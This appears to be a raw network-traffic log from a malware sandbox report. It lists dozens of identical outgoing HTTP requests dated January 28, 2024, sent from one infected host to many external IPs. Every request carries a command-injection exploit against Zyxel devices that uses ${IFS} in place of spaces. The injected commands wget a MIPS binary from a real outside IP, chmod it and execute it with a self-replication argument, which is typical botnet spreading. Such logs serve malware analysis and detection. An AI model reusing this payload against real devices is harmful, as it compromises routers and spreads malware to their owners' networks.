                                                        Jan 28, 2024 10:13:02.583812952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6826192.168.2.1446488154.32.101.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583852053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6827192.168.2.1455662172.152.124.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583904028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6828192.168.2.145682431.32.37.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583944082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6829192.168.2.1454330167.9.55.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.583986998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6830192.168.2.1447792144.173.67.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584027052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6831192.168.2.145765099.144.41.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584064960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6832192.168.2.145106460.44.179.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584121943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6833192.168.2.1442980111.173.3.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584172010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6834192.168.2.145858419.252.46.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584208965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6835192.168.2.144927437.164.22.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584233999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6836192.168.2.145094489.188.184.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584283113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6837192.168.2.1439660167.34.16.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584322929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6838192.168.2.144304686.118.117.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584371090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6839192.168.2.145513059.50.121.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584389925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6840192.168.2.1447628174.111.162.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584439993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6841192.168.2.144981260.146.43.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584482908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6842192.168.2.14480802.13.178.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584520102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6843192.168.2.1437358129.154.195.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584559917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6844192.168.2.1437016130.188.247.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584579945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6845192.168.2.144215632.28.221.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584614038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6846192.168.2.143529834.49.113.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584654093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6847192.168.2.1439782108.40.100.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584686041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6848192.168.2.1436540167.212.9.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584748030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6849192.168.2.145312054.47.36.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584783077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6850192.168.2.1435506202.230.66.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584810019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6851192.168.2.1449632107.17.105.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584858894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6852192.168.2.1439810157.239.28.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584897041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6853192.168.2.144262632.165.231.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584935904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6854192.168.2.1442698120.125.104.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.584973097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6855192.168.2.1438344188.208.242.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585006952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6856192.168.2.1448978221.128.94.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585068941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6857192.168.2.1439630109.43.227.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585112095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6858192.168.2.144674867.77.86.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585164070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6859192.168.2.1452592110.200.18.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585186005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6860192.168.2.1446832218.39.191.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585221052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6861192.168.2.144019036.65.195.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585259914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6862192.168.2.143814096.57.144.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585304022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6863192.168.2.1433116219.49.205.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585355043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6864192.168.2.1441448120.53.79.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585400105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6865192.168.2.1449700175.254.161.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585429907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6866192.168.2.1444736180.74.29.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585479975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6867192.168.2.1451604186.54.83.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585508108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6868192.168.2.1458210163.193.168.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585562944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6869192.168.2.145503223.11.10.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585581064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6870192.168.2.1433780181.116.158.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585623026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6871192.168.2.1438760157.20.190.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585674047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6872192.168.2.145270841.156.61.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585686922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6873192.168.2.145089818.70.183.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585748911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6874192.168.2.144472276.234.36.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585805893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6875192.168.2.1455936205.198.33.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585841894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6876192.168.2.145653282.103.24.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585875988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6877192.168.2.144691457.129.176.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585918903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6878192.168.2.1450816165.241.211.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585943937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6879192.168.2.144001435.45.152.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.585985899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6880192.168.2.145907667.53.181.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586018085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6881192.168.2.1454246108.100.25.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586042881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6882192.168.2.145709031.143.166.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586100101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6883192.168.2.144886837.121.28.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586150885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6884192.168.2.1457922156.81.64.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586199045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6885192.168.2.1436738122.52.48.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.586230040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6886192.168.2.1438600173.169.77.97443
                                                        TimestampBytes transferredDirectionData
